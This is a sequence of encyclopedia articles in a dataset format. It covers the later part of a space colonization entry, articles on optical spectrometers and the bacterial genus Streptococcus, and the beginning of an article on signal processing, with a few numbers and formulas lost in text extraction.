relocating a few privileged people and no permanent space migrants. The societal motivation for space migration has been questioned as rooted in colonialism, questioning the fundamentals and inclusivity of space colonization. Highlighting the need to reflect on such socio-economic issues beside the technical challenges for implementation. Governance A range of different models of transplanetary or extraterrestrial governance have been sketched or proposed. Often envisioning the need for a fresh or independent extraterrestrial governance, particularly in the void left by the contemporarily criticized lack of space governance and inclusivity. It has been argued that space colonialism would, similarly to terrestrial settler colonialism, produce colonial national identities. Federalism has been studied as a remedy of such distant and autonomous communities. Life support In space settlements, a life support system must recycle or import all the nutrients without "crashing." The closest terrestrial analogue to space life support is possibly that of a nuclear submarine. Nuclear submarines use mechanical life support systems to support humans for months without surfacing, and this same basic technology could presumably be employed for space use. However, nuclear submarines run "open loop"—extracting oxygen from seawater, and typically dumping carbon dioxide overboard, although they recycle existing oxygen. Another commonly proposed life-support system is a closed ecological system such as Biosphere 2. Solutions to health risks Although there are many physical, mental, and emotional health risks for future colonists and pioneers, solutions have been proposed to correct these problems. Mars500, HI-SEAS, and SMART-OP represent efforts to help reduce the effects of loneliness and confinement for long periods of time. Keeping contact with family members, celebrating holidays, and maintaining cultural identities all had an impact on minimizing the deterioration of mental health. There are also health tools in development to help astronauts reduce anxiety, as well as helpful tips to reduce the spread of germs and bacteria in a closed environment. Radiation risk may be reduced for astronauts by frequent monitoring and focusing work to minimize time away from shielding. Future space agencies can also ensure that every colonist would have a mandatory amount of daily exercise to prevent degradation of muscle. Radiation protection Cosmic rays and solar flares create a lethal radiation environment in space. In orbit around certain planets with magnetospheres (including Earth), the Van Allen belts make living above the atmosphere difficult. To protect life, settlements must be surrounded by sufficient mass to absorb most incoming radiation, unless magnetic or plasma radiation shields are developed. In the case of Van Allen belts, these could be drained using orbiting tethers or radio waves. Passive mass shielding of four metric tons per square meter of surface area will reduce radiation dosage to several mSv or less annually, well below the rate of some populated high natural background areas on Earth. This can be leftover material (slag) from processing lunar soil and asteroids into oxygen, metals, and other useful materials. However, it represents a significant obstacle to manoeuvering vessels with such massive bulk (mobile spacecraft being particularly likely to use less massive active shielding). Inertia would necessitate powerful thrusters to start or stop rotation, or electric motors to spin two massive portions of a vessel in opposite senses. Shielding material can be stationary around a rotating interior. Psychological adjustment The monotony and loneliness that comes from a prolonged space mission can leave astronauts susceptible to cabin fever or having a psychotic break. Moreover, lack of sleep, fatigue, and work overload can affect an astronaut's ability to perform well in an environment such as space where every action is critical. Economics Space colonization can roughly be said to be possible when the necessary methods of space colonization become cheap enough (such as space access by cheaper launch systems) to meet the cumulative funds that have been gathered for the purpose, in addition to estimated profits from commercial use of space. Although there are no immediate prospects for the large amounts of money required for space colonization to be available given traditional launch costs, there is some prospect of a radical reduction to launch costs in the 2010s, which would consequently lessen the cost of any efforts in that direction. With a published price of per launch of up to payload to low Earth orbit, SpaceX Falcon 9 rockets are already the "cheapest in the industry". Advancements currently being developed as part of the SpaceX reusable launch system development program to enable reusable Falcon 9s "could drop the price by an order of magnitude, sparking more space-based enterprise, which in turn would drop the cost of access to space still further through economies of scale." If SpaceX is successful in developing the reusable technology, it would be expected to "have a major impact on the cost of access to space", and change the increasingly competitive market in space launch services. The President's Commission on Implementation of United States Space Exploration Policy suggested that an inducement prize should be established, perhaps by government, for the achievement of space colonization, for example by offering the prize to the first organization to place humans on the Moon and sustain them for a fixed period before they return to Earth. Money and currency Experts have debated on the possible use of money and currencies in societies that will be established in space. The Quasi Universal Intergalactic Denomination, or QUID, is a physical currency made from a space-qualified polymer PTFE for inter-planetary travelers. QUID was designed for the foreign exchange company Travelex by scientists from Britain's National Space Centre and the University of Leicester. Other possibilities include the incorporation of cryptocurrency as the primary form of currency, as suggested by Elon Musk. Resources Colonies on the Moon, Mars, asteroids, or the metal-rich planet Mercury, could extract local materials. The Moon is deficient in volatiles such as argon, helium and compounds of carbon, hydrogen and nitrogen. The LCROSS impacter was targeted at the Cabeus crater which was chosen as having a high concentration of water for the Moon. A plume of material erupted in which some water was detected. Mission chief scientist Anthony Colaprete estimated that the Cabeus crater contains material with 1% water or possibly more. Water ice should also be in other permanently shadowed craters near the lunar poles. Although helium is present only in low concentrations on the Moon, where it is deposited into regolith by the solar wind, an estimated million tons of He-3 exists over all. It also has industrially significant oxygen, silicon, and metals such as iron, aluminium, and titanium. Launching materials from Earth is expensive, so bulk materials for colonies could come from the Moon, a near-Earth object (NEO), Phobos, or Deimos. The benefits of using such sources include: a lower gravitational force, no atmospheric drag on cargo vessels, and no biosphere to damage. Many NEOs contain substantial amounts of metals. Underneath a drier outer crust (much like oil shale), some other NEOs are inactive comets which include billions of tons of water ice and kerogen hydrocarbons, as well as some nitrogen compounds. Farther out, Jupiter's Trojan asteroids are thought to be rich in water ice and other volatiles. Recycling of some raw materials would almost certainly be necessary. Energy Solar energy in orbit is abundant, reliable, and is commonly used to power satellites today. There is no night in free space, and no clouds or atmosphere to block sunlight. Light intensity obeys an inverse-square law. So the solar energy available at distance d from the Sun is E = 1367/d2 W/m2, where d is measured in astronomical units (AU) and 1367 watts/m2 is the energy available at the distance of Earth's orbit from the Sun, 1 AU. In the weightlessness and vacuum of space, high temperatures for industrial processes can easily be achieved in solar ovens with huge parabolic reflectors made of metallic foil with very lightweight support structures. Flat mirrors to reflect sunlight around radiation shields into living areas (to avoid line-of-sight access for cosmic rays, or to make the Sun's image appear to move across their "sky") or onto crops are even lighter and easier to build. Large solar power photovoltaic cell arrays or thermal power plants would be needed to meet the electrical power needs of the settlers' use. In developed parts of Earth, electrical consumption can average 1 kilowatt/person (or roughly 10 megawatt-hours per person per year.) These power plants could be at a short distance from the main structures if wires are used to transmit the power, or much farther away with wireless power transmission. A major export of the initial space settlement designs was anticipated to be large solar power satellites (SPS) that would use wireless power transmission (phase-locked microwave beams or lasers emitting wavelengths that special solar cells convert with high efficiency) to send power to locations on Earth, or to colonies on the Moon or other locations in space. For locations on Earth, this method of getting power is extremely benign, with zero emissions and far less ground area required per watt than for conventional solar panels. Once these satellites are primarily built from lunar or asteroid-derived materials, the price of SPS electricity could be lower than energy from fossil fuel or nuclear energy; replacing these would have significant benefits such as the elimination of greenhouse gases and nuclear waste from electricity generation. Transmitting solar energy wirelessly from the Earth to the Moon and back is also an idea proposed for the benefit of space colonization and energy resources. Physicist Dr. David Criswell, who worked for NASA during the Apollo missions, proposed the idea of using power beams to transfer energy from space. These beams, microwaves with a wavelength of about 12 cm, would be almost untouched as they travel through the atmosphere. They could also be aimed at more industrial areas to keep away from humans or animal activities. This would allow for safer and more reliable methods of transferring solar energy. In 2008, scientists were able to send a 20 watt microwave signal from a mountain on the island of Maui to the island of Hawaii. Since then JAXA and Mitsubishi have been working together on a $21 billion project to place satellites in orbit which could generate up to 1 gigawatt of energy. These are the next advancements being done today to transmit energy wirelessly for space-based solar energy. However, the value of SPS power delivered wirelessly to other locations in space will typically be far higher than to Earth. Otherwise, the means of generating the power would need to be included with these projects and pay the heavy penalty of Earth launch costs. Therefore, other than proposed demonstration projects for power delivered to Earth, the first priority for SPS electricity is likely to be locations in space, such as communications satellites, fuel depots or "orbital tugboat" boosters transferring cargo and passengers between low Earth orbit (LEO) and other orbits such as geosynchronous orbit (GEO), lunar orbit or highly-eccentric Earth orbit (HEEO). The system will also rely on satellites and receiving stations on Earth to convert the energy into electricity. Because this energy can be transmitted easily from dayside to nightside, power would be reliable 24/7. Nuclear power is sometimes proposed for colonies located on the Moon or on Mars, as the supply of solar energy is too discontinuous in these locations; the Moon has nights of two Earth weeks in duration. Mars has nights, relatively high gravity, and an atmosphere featuring large dust storms to cover and degrade solar panels. Also, Mars' greater distance from the Sun (1.52 astronomical units, AU) means that only 1/1.522 or about 43% of the solar energy is available at Mars compared with Earth orbit. Another method would be transmitting energy wirelessly to the lunar or Martian colonies from solar power satellites (SPSs) as described above; the difficulties of generating power in these locations make the relative advantages of SPSs much greater there than for power beamed to locations on Earth. In order to also be able to fulfill the requirements of a Moon base and energy to supply life support, maintenance, communications, and research, a combination of both nuclear and solar energy may be used in the first colonies. For both solar thermal and nuclear power generation in airless environments, such as the Moon and space, and to a lesser extent the very thin Martian atmosphere, one of the main difficulties is dispersing the inevitable heat generated. This requires fairly large radiator areas. Self-replication Space manufacturing could enable self-replication. Some consider it the ultimate goal because it would allow an exponential increase in colonies, while eliminating costs to, and dependence on, Earth. It could be argued that the establishment of such a colony would be Earth's first act of self-replication. Intermediate goals include colonies that expect only information from Earth (science, engineering, entertainment) and colonies that just require periodic supply of light weight objects, such as integrated circuits, medicines, genetic material and tools. Population size In 2002, the anthropologist John H. Moore estimated that a population of 150–180 would permit a stable society to exist for 60 to 80 generations—equivalent to 2,000 years. Assuming a journey of 6,300 years, the astrophysicist Frédéric Marin and the particle physicist Camille Beluffi calculated that the minimum viable population for a generation ship to reach Proxima Centauri would be 98 settlers at the beginning of the mission (then the crew will breed until reaching a stable population of several hundred settlers within the ship). In 2020, Jean-Marc Salotti proposed a method to determine the minimum number of settlers to survive on an extraterrestrial world. It is based on the comparison between the required time to perform all activities and the working time of all human resources. For Mars, 110 individuals would be required. Advocacy Several private companies have announced plans toward the colonization of Mars. Among entrepreneurs leading the call for space colonization are Elon Musk, Dennis Tito and Bas Lansdorp. Involved organizations Organizations that contribute to space colonization include: The National Space Society (NSS) is an organization with the vision of people living and working in thriving communities beyond the Earth. The NSS also maintains an extensive library of full-text articles and books on space settlement. The Space Frontier Foundation performs space advocacy including strong free market, capitalist views about space development. The Mars Society promotes Robert Zubrin's Mars Direct plan and the settlement of Mars. The Space Settlement Institute is searching for ways to make space colonization happen within a lifetime. SpaceX is developing extensive spaceflight transportation infrastructure with the express purpose of enabling long-term human settlement of Mars. The Space Studies Institute funds the study of outer space settlements, especially O'Neill cylinders. The Alliance to Rescue Civilization plans to establish backups of human civilization on the Moon and other locations away from Earth. The Artemis Project plans to set up a private lunar surface station. The British Interplanetary Society (BIS) promotes ideas for the exploration and use of space, including a Mars colony, future propulsion systems (see Project Daedalus), terraforming, and locating other habitable worlds. In June 2013 the BIS began the SPACE project to re-examine Gerard O'Neill's 1970s space colony studies in light of the advances made since then. The progress of this effort were detailed in a special edition of the BIS journal in September 2019. Asgardia (nation) – an organization searching to circumvent limitations placed by Outer Space Treaty. The Cyprus Space Exploration Organisation promotes space exploration and colonization, and fosters collaboration in space. Terrestrial analogues to space settlement Many space agencies build "testbeds", which are facilities on Earth for testing advanced life support systems, but these are designed for long duration human spaceflight, not permanent colonization. The most famous attempt to build an analogue to a self-sufficient settlement is Biosphere 2, which attempted to duplicate Earth's biosphere. BIOS-3 is another closed ecosystem, completed in 1972 in Krasnoyarsk, Siberia. The Mars Desert Research Station has a habitat for similar reasons, but the surrounding climate is not strictly inhospitable. Devon Island Mars Arctic Research Station, can also provide some practice for off-world outpost construction and operation. In media and fiction Although established space habitats are a stock element in science fiction stories, fictional works that explore the themes, social or practical, of the settlement and occupation of a habitable world are more rare. Solaris is noted for its critique of space colonization of inhabited planets. At one point, one of the characters says: In 2022 Rudolph Herzog and Werner Herzog presented an in-depth documentary with Lucianne Walkowicz called Last exit: Space.
Technology
Basics_6
null
29293
https://en.wikipedia.org/wiki/Optical%20spectrometer
Optical spectrometer
An optical spectrometer (spectrophotometer, spectrograph or spectroscope) is an instrument used to measure properties of light over a specific portion of the electromagnetic spectrum, typically used in spectroscopic analysis to identify materials. The variable measured is most often the irradiance of the light but could also, for instance, be the polarization state. The independent variable is usually the wavelength of the light or a closely derived physical quantity, such as the corresponding wavenumber or the photon energy, in units of measurement such as centimeters, reciprocal centimeters, or electron volts, respectively. A spectrometer is used in spectroscopy for producing spectral lines and measuring their wavelengths and intensities. Spectrometers may operate over a wide range of non-optical wavelengths, from gamma rays and X-rays into the far infrared. If the instrument is designed to measure the spectrum on an absolute scale rather than a relative one, then it is typically called a spectrophotometer. The majority of spectrophotometers are used in spectral regions near the visible spectrum. A spectrometer that is calibrated for measurement of the incident optical power is called a spectroradiometer. In general, any particular instrument will operate over a small portion of this total range because of the different techniques used to measure different portions of the spectrum. Below optical frequencies (that is, at microwave and radio frequencies), the spectrum analyzer is a closely related electronic device. Spectrometers are used in many fields. For example, they are used in astronomy to analyze the radiation from objects and deduce their chemical composition. The spectrometer uses a prism or a grating to spread the light into a spectrum. This allows astronomers to detect many of the chemical elements by their characteristic spectral lines. These lines are named for the elements which cause them, such as the hydrogen alpha, beta, and gamma lines. A glowing object will show bright spectral lines. Dark lines are made by absorption, for example by light passing through a gas cloud, and these absorption lines can also identify chemical compounds. Much of our knowledge of the chemical makeup of the universe comes from spectra. Spectroscopes Spectroscopes are often used in astronomy and some branches of chemistry. Early spectroscopes were simply prisms with graduations marking wavelengths of light. Modern spectroscopes generally use a diffraction grating, a movable slit, and some kind of photodetector, all automated and controlled by a computer. Recent advances have seen increasing reliance of computational algorithms in a range of miniaturised spectrometers without diffraction gratings, for example, through the use of quantum dot-based filter arrays on to a CCD chip or a series of photodetectors realised on a single nanostructure. Joseph von Fraunhofer developed the first modern spectroscope by combining a prism, diffraction slit and telescope in a manner that increased the spectral resolution and was reproducible in other laboratories. Fraunhofer also went on to invent the first diffraction spectroscope. Gustav Robert Kirchhoff and Robert Bunsen discovered the application of spectroscopes to chemical analysis and used this approach to discover caesium and rubidium. Kirchhoff and Bunsen's analysis also enabled a chemical explanation of stellar spectra, including Fraunhofer lines. When a material is heated to incandescence it emits light that is characteristic of the atomic makeup of the material. Particular light frequencies give rise to sharply defined bands on the scale which can be thought of as fingerprints. For example, the element sodium has a very characteristic double yellow band known as the Sodium D-lines at 588.9950 and 589.5924 nanometers, the color of which will be familiar to anyone who has seen a low pressure sodium vapor lamp. In the original spectroscope design in the early 19th century, light entered a slit and a collimating lens transformed the light into a thin beam of parallel rays. The light then passed through a prism (in hand-held spectroscopes, usually an Amici prism) that refracted the beam into a spectrum because different wavelengths were refracted different amounts due to dispersion. This image was then viewed through a tube with a scale that was transposed upon the spectral image, enabling its direct measurement. With the development of photographic film, the more accurate spectrograph was created. It was based on the same principle as the spectroscope, but it had a camera in place of the viewing tube. In recent years, the electronic circuits built around the photomultiplier tube have replaced the camera, allowing real-time spectrographic analysis with far greater accuracy. Arrays of photosensors are also used in place of film in spectrographic systems. Such spectral analysis, or spectroscopy, has become an important scientific tool for analyzing the composition of unknown material and for studying astronomical phenomena and testing astronomical theories. In modern spectrographs in the UV, visible, and near-IR spectral ranges, the spectrum is generally given in the form of photon number per unit wavelength (nm or μm), wavenumber (μm−1, cm−1), frequency (THz), or energy (eV), with the units indicated by the abscissa. In the mid- to far-IR, spectra are typically expressed in units of Watts per unit wavelength (μm) or wavenumber (cm−1). In many cases, the spectrum is displayed with the units left implied (such as "digital counts" per spectral channel). In Gemology Gemologists frequently use spectroscopes to determine the absorption spectra of gemstones, thereby allowing them to make inferences about what kind of gem they are examining. A gemologist may compare the absorption spectrum they observe with a catalogue of spectra for various gems to help narrow down the exact identity of the gem. Spectrographs A spectrograph is an instrument that separates light into its wavelengths and records the data. A spectrograph typically has a multi-channel detector system or camera that detects and records the spectrum of light. The term was first used in 1876 by Dr. Henry Draper when he invented the earliest version of this device, and which he used to take several photographs of the spectrum of Vega. This earliest version of the spectrograph was cumbersome to use and difficult to manage. There are several kinds of machines referred to as spectrographs, depending on the precise nature of the waves. The first spectrographs used photographic paper as the detector. The plant pigment phytochrome was discovered using a spectrograph that used living plants as the detector. More recent spectrographs use electronic detectors, such as CCDs which can be used for both visible and UV light. The exact choice of detector depends on the wavelengths of light to be recorded. A spectrograph is sometimes called polychromator, as an analogy to monochromator. Stellar and solar spectrograph The star spectral classification and discovery of the main sequence, Hubble's law and the Hubble sequence were all made with spectrographs that used photographic paper. James Webb Space Telescope contains both a near-infrared spectrograph (NIRSpec) and a mid-infrared spectrograph (MIRI). Echelle spectrograph An echelle-based spectrograph uses two diffraction gratings, rotated 90 degrees with respect to each other and placed close to one another. Therefore, an entrance point and not a slit is used and a CCD-chip records the spectrum. Both gratings have a wide spacing, and one is blazed so that only the first order is visible and the other is blazed with many higher orders visible, so a very fine spectrum is presented to the CCD. Slitless spectrograph In conventional spectrographs, a slit is inserted into the beam to limit the image extent in the dispersion direction. A slitless spectrograph omits the slit; this results in images that convolve the image information with spectral information along the direction of dispersion. If the field is not sufficiently sparse, then spectra from different sources in the image field will overlap. The trade is that slitless spectrographs can produce spectral images much more quickly than scanning a conventional spectrograph. That is useful in applications such as solar physics where time evolution is important.
Technology
Measuring instruments
null
29318
https://en.wikipedia.org/wiki/Streptococcus
Streptococcus
Streptococcus is a genus of gram-positive or spherical bacteria that belongs to the family Streptococcaceae, within the order Lactobacillales (lactic acid bacteria), in the phylum Bacillota. Cell division in streptococci occurs along a single axis, thus when growing they tend to form pairs or chains, which may appear bent or twisted. This differs from staphylococci, which divide along multiple axes, thereby generating irregular, grape-like clusters of cells. Most streptococci are oxidase-negative and catalase-negative, and many are facultative anaerobes (capable of growth both aerobically and anaerobically). The term was coined in 1877 by Viennese surgeon Albert Theodor Billroth (1829–1894), by combining the prefix "strepto-" (from ), together with the suffix "-coccus" (from Modern , from .) In 1984, many bacteria formerly grouped in the genus Streptococcus were separated out into the genera Enterococcus and Lactococcus. Currently, over 50 species are recognised in this genus. This genus has been found to be part of the salivary microbiome. Pathogenesis and classification In addition to streptococcal pharyngitis (strep throat), certain Streptococcus species are responsible for many cases of pink eye, meningitis, bacterial pneumonia, endocarditis, erysipelas, and necrotizing fasciitis (the 'flesh-eating' bacterial infections). However, many streptococcal species are not pathogenic, and form part of the commensal human microbiota of the mouth, skin, intestine, and upper respiratory tract. Streptococci are also a necessary ingredient in producing Emmentaler ("Swiss") cheese. Species of streptococci are classified based on their hemolytic properties. Alpha-hemolytic species cause oxidization of iron in hemoglobin molecules within red blood cells, giving it a greenish color on blood agar. Beta-hemolytic species cause complete rupture of red blood cells. On blood agar, this appears as wide areas clear of blood cells surrounding bacterial colonies. Gamma-hemolytic species cause no hemolysis. Beta-hemolytic streptococci are further classified by Lancefield grouping, a serotype classification (that is, describing specific carbohydrates present on the bacterial cell wall). The 21 described serotypes are named Lancefield groups A to W (excluding E, I and J). This system of classification was developed by Rebecca Lancefield, a scientist at Rockefeller University. In the medical setting, the most important groups are the alpha-hemolytic streptococci S. pneumoniae and Streptococcus viridans groups, and the beta-hemolytic streptococci of Lancefield groups A and B (also known as "group A strep" and "group B strep"). Table: Medically relevant streptococci Alpha-hemolytic When alpha-hemolysis (α-hemolysis) is present, the agar under the colony will appear dark and greenish due to the conversion of hemoglobin to green biliverdin. Streptococcus pneumoniae and a group of oral streptococci (Streptococcus viridans or viridans streptococci) display alpha-hemolysis. Alpha-hemolysis is also termed incomplete hemolysis or partial hemolysis because the cell membranes of the red blood cells are left intact. This is also sometimes called green hemolysis because of the color change in the agar. Pneumococci S. pneumoniae (sometimes called pneumococcus), is a leading cause of bacterial pneumonia and the occasional etiology of otitis media, sinusitis, meningitis, and peritonitis. Inflammation is thought to be the major cause of how pneumococci cause disease, hence the tendency of diagnoses associated with them to involve inflammation. They possess no Lancefield antigens. The viridans group: alpha-hemolytic The viridans streptococci are a large group of commensal bacteria that are either alpha-hemolytic, producing a green coloration on blood agar plates (hence the name "viridans", from Latin vĭrĭdis, green), or nonhemolytic. They possess no Lancefield antigens. Beta-hemolytic Beta-hemolysis (β-hemolysis), sometimes called complete hemolysis, is a complete lysis of red cells in the media around and under the colonies: the area appears lightened (yellow) and transparent. Streptolysin, an exotoxin, is the enzyme produced by the bacteria which causes the complete lysis of red blood cells. There are two types of streptolysin: Streptolysin O (SLO) and streptolysin S (SLS). Streptolysin O is an oxygen-sensitive cytotoxin, secreted by most group A Streptococcus (GAS), and interacts with cholesterol in the membrane of eukaryotic cells (mainly red and white blood cells, macrophages, and platelets), and usually results in beta-hemolysis under the surface of blood agar. Streptolysin S is an oxygen-stable cytotoxin also produced by most GAS strains which results in clearing on the surface of blood agar. SLS affects immune cells, including polymorphonuclear leukocytes and lymphocytes, and is thought to prevent the host immune system from clearing infection. Streptococcus pyogenes, or GAS, displays beta hemolysis. Some weakly beta-hemolytic species cause intense hemolysis when grown together with a strain of Staphylococcus. This is called the CAMP test. Streptococcus agalactiae displays this property. Clostridium perfringens can be identified presumptively with this test. Listeria monocytogenes is also positive on sheep's blood agar. Group A Group A S. pyogenes is the causative agent in a wide range of group A streptococcal infections (GAS). These infections may be noninvasive or invasive. The noninvasive infections tend to be more common and less severe. The most common of these infections include streptococcal pharyngitis (strep throat) and impetigo. Scarlet fever is another example of Group A noninvasive infection. The invasive infections caused by group A beta-hemolytic streptococci tend to be more severe and less common. This occurs when the bacterium is able to infect areas where it is not usually found, such as the blood and organs. The diseases that may be caused include streptococcal toxic shock syndrome, necrotizing fasciitis, pneumonia, and bacteremia. Globally, GAS has been estimated to cause more than 500,000 deaths every year, making it one of the world's leading pathogens. Additional complications may be caused by GAS, namely acute rheumatic fever and acute glomerulonephritis. Rheumatic fever, a disease that affects the joints, kidneys, and heart valves, is a consequence of untreated strep A infection caused not by the bacterium itself, but due to the antibodies created by the immune system to fight off the infection cross-reacting with other proteins in the body. This "cross-reaction" causes the body to essentially attack itself and leads to the damage above. A similar autoimmune mechanism initiated by Group A beta-hemolytic streptococcal (GABHS) infection is hypothesized to cause pediatric autoimmune neuropsychiatric disorders associated with streptococcal infections (PANDAS), wherein autoimmune antibodies affect the basal ganglia, causing rapid onset of psychiatric, motor, sleep, and other symptoms in pediatric patients. GAS infection is generally diagnosed with a rapid strep test or by culture. Group B S. agalactiae, or group B streptococcus, GBS, causes pneumonia and meningitis in newborns and the elderly, with occasional systemic bacteremia. Importantly, Streptococcus agalactiae is the most common cause of meningitis in infants from one month to three months old. They can also colonize the intestines and the female reproductive tract, increasing the risk for premature rupture of membranes during pregnancy, and transmission of the organism to the infant. The American College of Obstetricians and Gynecologists, American Academy of Pediatrics, and the Centers for Disease Control recommend all pregnant women between 35 and 37 weeks gestation to be tested for GBS. Women who test positive should be given prophylactic antibiotics during labor, which will usually prevent transmission to the infant. Group III polysaccharide vaccines have been proven effective in preventing the passing of GBS from mother to infant. The United Kingdom has chosen to adopt a risk factor-based protocol, rather than the culture-based protocol followed in the US. Current guidelines state that if one or more of the following risk factors is present, then the woman should be treated with intrapartum antibiotics: GBS bacteriuria during this pregnancy History of GBS disease in a previous infant Intrapartum fever (≥38 °C) Preterm labour (<37 weeks) Prolonged rupture of membranes (>18 hours) This protocol results in the administration of intrapartum antibiotics to 15–20% of pregnant women and the prevention of 65–70% of cases of early onset GBS sepsis. Group C This group includes S. equi, which causes strangles in horses, and S. zooepidemicus — S. equi is a clonal descendant or biovar of the ancestral S. zooepidemicus — which causes infections in several species of mammals, including cattle and horses. S. dysgalactiae subsp. dysgalactiae is also a member of group C, beta-haemolytic streptococci that can cause pharyngitis and other pyogenic infections similar to group A streptococci. Group C streptococcal bacteria are considered zoonotic pathogens, meaning infection can be passed from animal to human. Group D (enterococci) Many former group D streptococci have been reclassified and placed in the genus Enterococcus (including E. faecalis, E. faecium, E. durans, and E. avium). For example, Streptococcus faecalis is now Enterococcus faecalis. E. faecalis is sometimes alpha-hemolytic and E. faecium is sometimes beta hemolytic. The remaining nonenterococcal group D strains include Streptococcus gallolyticus, Streptococcus bovis, Streptococcus equinus and Streptococcus suis. Nonhemolytic streptococci rarely cause illness. However, weakly hemolytic group D beta-hemolytic streptococci and Listeria monocytogenes (which is actually a gram-positive bacillus) should not be confused with nonhemolytic streptococci. Group F streptococci Group F streptococci were first described in 1934 by Long and Bliss among the "minute haemolytic streptococci". They are also known as Streptococcus anginosus (according to the Lancefield classification system) or as members of the S. milleri group (according to the European system). Group G streptococci These streptococci are usually, but not exclusively, beta-hemolytic. Streptococcus dysgalactiae subsp. canis is the predominant subspecies encountered. It is a particularly common GGS in humans, although it is typically found on animals. S. phocae is a GGS subspecies that has been found in marine mammals and marine fish species. In marine mammals it has been mainly associated with meningoencephalitis, sepsis, and endocarditis, but is also associated with many other pathologies. Its environmental reservoir and means of transmission in marine mammals is not well characterized. Group G streptococci are also considered zoonotic pathogens. Group H streptococci Group H streptococci cause infections in medium-sized canines. Group H streptococci rarely cause human illness unless a human has direct contact with the mouth of a canine. One of the most common ways this can be spread is human-to-canine, mouth-to-mouth contact. However, the canine may lick the human's hand and infection can be spread, as well. Clinical identification In clinical practice, the most common groups of Streptococcus can be distinguished by simple bench tests, such as the PYR test for group A streptococcus. There are also latex agglutination kits which can distinguish each of the main groups seen in clinical practice. Treatment Streptococcal infections can be treated with antibiotics from the penicillin family. Most commonly, penicillin or amoxicillin is used to treat strep infection. These antibiotics work by disrupting peptidoglycan production in the cell wall. Treatment most often occurs as a 10-day oral antibiotic cycle. For patients with penicillin allergies and those suffering from skin infections, clindamycin can be used. Clindamycin works by disrupting protein synthesis within the cell. Molecular taxonomy and phylogenetics Streptococci have been divided into six groups on the basis of their 16S rDNA sequences: S. anginosus, S. gallolyticus, S. mitis, S. mutans, S. pyogenes and S. salivarius. The 16S groups have been confirmed by whole genome sequencing (see figure). The important pathogens S. pneumoniae and S. pyogenes belong to the S. mitis and S. pyogenes groups, respectively, while the causative agent of dental caries, Streptococcus mutans, is basal to the Streptococcus group. Recent technological advances have resulted in an increase of available genome sequences for Streptococcus species, allowing for more robust and reliable phylogenetic and comparative genomic analyses to be conducted. In 2018, the evolutionary relationships within Streptococcus was re-examined by Patel and Gupta through the analysis of comprehensive phylogenetic trees constructed based on four different datasets of proteins and the identification of 134 highly specific molecular signatures (in the form of conserved signature indels) that are exclusively shared by the entire genus or its distinct subclades. The results revealed the presence of two main clades at the highest level within Streptococcus, termed the "Mitis-Suis" and "Pyogenes-Equinus-Mutans" clades. The "Mitis-Suis" main clade comprises the Suis subclade and the Mitis clade, which encompasses the Angiosus, Pneumoniae, Gordonii and Parasanguinis subclades. The second main clade, the "Pyogenes-Equinus-Mutans", includes the Pyogenes, Mutans, Salivarius, Equinus, Sobrinus, Halotolerans, Porci, Entericus and Orisratti subclades. In total, 14 distinct subclades have been identified within the genus Streptococcus, each supported by reliable branching patterns in phylogenetic trees and by the presence of multiple conserved signature indels in different proteins that are distinctive characteristics of the members of these 14 clades. A summary diagram showing the overall relationships among the Streptococcus based on these studies is depicted in a figure on this page. Genomics The genomes of hundreds of species have been sequenced. Most Streptococcus genomes are 1.8 to 2.3 Mb in size and encode 1,700 to 2,300 proteins. Some important genomes are listed in the table. The four species shown in the table (S. pyogenes, S. agalactiae, S. pneumoniae, and S. mutans) have an average pairwise protein sequence identity of about 70%. Bacteriophage Bacteriophages have been described for many species of Streptococcus. 18 prophages have been described in S. pneumoniae that range in size from 38 to 41 kb in size, encoding from 42 to 66 genes each. Some of the first Streptococcus phages discovered were Dp-1 and ω1 (alias ω-1). In 1981 the Cp (Complutense phage 1, officially Streptococcus virus Cp1, Picovirinae) family was discovered with Cp-1 as its first member. Dp-1 and Cp-1 infect both S. pneumoniae and S. mitis. However, the host ranges of most Streptococcus phages have not been investigated systematically. Natural genetic transformation Natural genetic transformation involves the transfer of DNA from one bacterium to another through the surrounding medium. Transformation is a complex process dependent on the expression of numerous genes. To be capable of transformation a bacterium must enter a special physiologic state referred to as competence. S. pneumoniae, S. mitis and S. oralis can become competent, and as a result actively acquire homologous DNA for transformation by a predatory fratricidal mechanism This fratricidal mechanism mainly exploits non-competent siblings present in the same niche Among highly competent isolates of S. pneumoniae, Li et al. showed that nasal colonization fitness and virulence (lung infectivity) depend on an intact competence system. Competence may allow the streptococcal pathogen to use external homologous DNA for recombinational repair of DNA damages caused by the host's oxidative attack.
Biology and health sciences
Gram-positive bacteria
Plants
29324
https://en.wikipedia.org/wiki/Signal%20processing
Signal processing
Signal processing is an electrical engineering subfield that focuses on analyzing, modifying and synthesizing signals, such as sound, images, potential fields, seismic signals, altimetry processing, and scientific measurements. Signal processing techniques are used to optimize transmissions, digital storage efficiency, correcting distorted signals, improve subjective video quality, and to detect or pinpoint components of interest in a measured signal. History According to Alan V. Oppenheim and Ronald W. Schafer, the principles of signal processing can be found in the classical numerical analysis techniques of the 17th century. They further state that the digital refinement of these techniques can be found in the digital control systems of the 1940s and 1950s. In 1948, Claude Shannon wrote the influential paper "A Mathematical Theory of Communication" which was published in the Bell System Technical Journal. The paper laid the groundwork for later development of information communication systems and the processing of signals for transmission. Signal processing matured and flourished in the 1960s and 1970s, and digital signal processing became widely used with specialized digital signal processor chips in the 1980s. Definition of a signal A signal is a function , where this function is either deterministic (then one speaks of a deterministic signal) or a path , a realization of a stochastic process Categories Analog Analog signal processing is for signals that have not been digitized, as in most 20th-century radio, telephone, and television systems. This involves linear electronic circuits as well as nonlinear ones. The former are, for instance, passive filters, active filters, additive mixers, integrators, and delay lines. Nonlinear circuits include compandors, multipliers (frequency mixers, voltage-controlled amplifiers), voltage-controlled filters, voltage-controlled oscillators, and phase-locked loops. Continuous time Continuous-time signal processing is for signals that vary with the change of continuous domain (without considering some individual interrupted points). The methods of signal processing include time domain, frequency domain, and complex frequency domain. This technology mainly discusses the modeling of a linear time-invariant continuous system, integral of the system's zero-state response, setting up system function and the continuous time filtering of deterministic signals. For example, in time domain, a continuous-time signal passing through a linear time-invariant filter/system denoted as , can be expressed at the output as In some contexts, is referred to as the impulse response of the system. The above convolution operation is conducted between the input and the system. Discrete time Discrete-time signal processing is for sampled signals, defined only at discrete points in time, and as such are quantized in time, but not in magnitude. Analog discrete-time signal processing is a technology based on electronic devices such as sample and hold circuits, analog time-division multiplexers, analog delay lines and analog feedback shift registers. This technology was a predecessor of digital signal processing (see below), and is still used in advanced processing of gigahertz signals. The concept of discrete-time signal processing also refers to a theoretical discipline that establishes a mathematical basis for digital signal processing, without taking quantization error into consideration. Digital Digital signal processing is the processing of digitized discrete-time sampled signals. Processing is done by general-purpose computers or by digital circuits such as 